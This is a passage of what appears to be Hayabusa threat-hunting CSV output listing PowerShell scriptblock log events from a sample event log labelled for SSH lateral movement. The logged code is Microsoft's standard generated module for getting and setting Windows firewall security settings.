$script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.893 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = 